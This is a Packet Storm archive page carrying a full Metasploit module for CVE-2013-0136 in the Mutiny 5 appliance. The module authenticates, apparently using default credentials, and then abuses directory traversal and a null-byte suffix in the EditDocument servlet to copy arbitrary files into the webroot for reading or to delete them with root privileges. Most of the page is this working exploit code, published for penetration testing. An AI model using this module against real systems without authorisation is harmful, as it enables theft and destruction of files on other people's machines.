what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Mutiny 5 Arbitrary File Read And Delete

Mutiny 5 Arbitrary File Read And Delete
Posted Aug 31, 2024
Authored by juan vazquez | Site metasploit.com

This Metasploit module exploits the EditDocument servlet from the frontend on the Mutiny 5 appliance. The EditDocument servlet provides file operations, such as copy and delete, which are affected by a directory traversal vulnerability. Because of this, any authenticated frontend user can read and delete arbitrary files from the system with root privileges. In order to exploit the vulnerability a valid user (any role) in the web frontend is required. The module has been tested successfully on the Mutiny 5.0-1.07 appliance.

tags | exploit, web, arbitrary, root
advisories | CVE-2013-0136
SHA-256 | d3b96cef983073a378f5d44a96a275b1a30b7aaa70f28edd1fb2d4b093beab71

Mutiny 5 Arbitrary File Read And Delete

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Mutiny 5 Arbitrary File Read and Delete',
'Description' => %q{
This module exploits the EditDocument servlet from the frontend on the Mutiny 5
appliance. The EditDocument servlet provides file operations, such as copy and
delete, which are affected by a directory traversal vulnerability. Because of this,
any authenticated frontend user can read and delete arbitrary files from the system
with root privileges. In order to exploit the vulnerability a valid user (any role)
in the web frontend is required. The module has been tested successfully on the
Mutiny 5.0-1.07 appliance.
},
'Author' => [
'juan vazquez' # Metasploit module and initial discovery
],
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2013-0136' ],
[ 'US-CERT-VU', '701572' ],
[ 'URL', 'https://www.rapid7.com/blog/post/2013/05/15/new-1day-exploits-mutiny-vulnerabilities/' ]
],
'Actions' => [
['Read', { 'Description' => 'Read arbitrary file' }],
['Delete', { 'Description' => 'Delete arbitrary file' }]
],
'DefaultAction' => 'Read',
'DisclosureDate' => '2013-05-15'
)
)

register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [true, 'Path to Mutiny Web Service', '/']),
OptString.new('USERNAME', [ true, 'The user to authenticate as', 'superadmin@mutiny.com' ]),
OptString.new('PASSWORD', [ true, 'The password to authenticate with', 'password' ]),
OptString.new('PATH', [ true, 'The file to read or delete' ]),
]
)
end

def run
print_status('Trying to login')
if login
print_good('Login Successful')
else
print_error('Login failed, review USERNAME and PASSWORD options')
return
end

case action.name
when 'Read'
read_file(datastore['PATH'])
when 'Delete'
delete_file(datastore['PATH'])
end
end

def read_file(file)
print_status('Copying file to Web location...')

dst_path = '/usr/jakarta/tomcat/webapps/ROOT/m/'
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, 'interface', 'EditDocument'),
'method' => 'POST',
'cookie' => "JSESSIONID=#{@session}",
'encode_params' => false,
'vars_post' => {
'operation' => 'COPY',
'paths[]' => "../../../../#{file}%00.txt",
'newPath' => "../../../..#{dst_path}"
}
}
)

if res && (res.code == 200) && res.body =~ (/\{"success":true\}/)
print_good("File #{file} copied to #{dst_path} successfully")
else
print_error("Failed to copy #{file} to #{dst_path}")
end

print_status('Retrieving file contents...')

res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, 'm', ::File.basename(file)),
'method' => 'GET'
}
)

if res && (res.code == 200)
store_path = store_loot('mutiny.frontend.data', 'application/octet-stream', rhost, res.body, file)
print_good("File successfully retrieved and saved on #{store_path}")
else
print_error('Failed to retrieve file')
end

# Cleanup
delete_file("#{dst_path}#{::File.basename(file)}")
end

def delete_file(file)
print_status("Deleting file #{file}")

res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, 'interface', 'EditDocument'),
'method' => 'POST',
'cookie' => "JSESSIONID=#{@session}",
'vars_post' => {
'operation' => 'DELETE',
'paths[]' => "../../../../#{file}"
}
}
)

if res && (res.code == 200) && res.body =~ (/\{"success":true\}/)
print_good("File #{file} deleted")
else
print_error("Error deleting file #{file}")
end
end

def login
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, 'interface', 'index.do'),
'method' => 'GET'
}
)

if res && (res.code == 200) && res.get_cookies =~ (/JSESSIONID=(.*);/)
first_session = ::Regexp.last_match(1)
end

res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, 'interface', 'j_security_check'),
'method' => 'POST',
'cookie' => "JSESSIONID=#{first_session}",
'vars_post' => {
'j_username' => datastore['USERNAME'],
'j_password' => datastore['PASSWORD']
}
}
)

if !res || (res.code != 302) || res.headers['Location'] !~ (%r{interface/index.do})
return false
end

res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, 'interface', 'index.do'),
'method' => 'GET',
'cookie' => "JSESSIONID=#{first_session}"
}
)

if res && (res.code == 200) && res.get_cookies =~ (/JSESSIONID=(.*);/)
@session = ::Regexp.last_match(1)
return true
end

return false
end
end
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close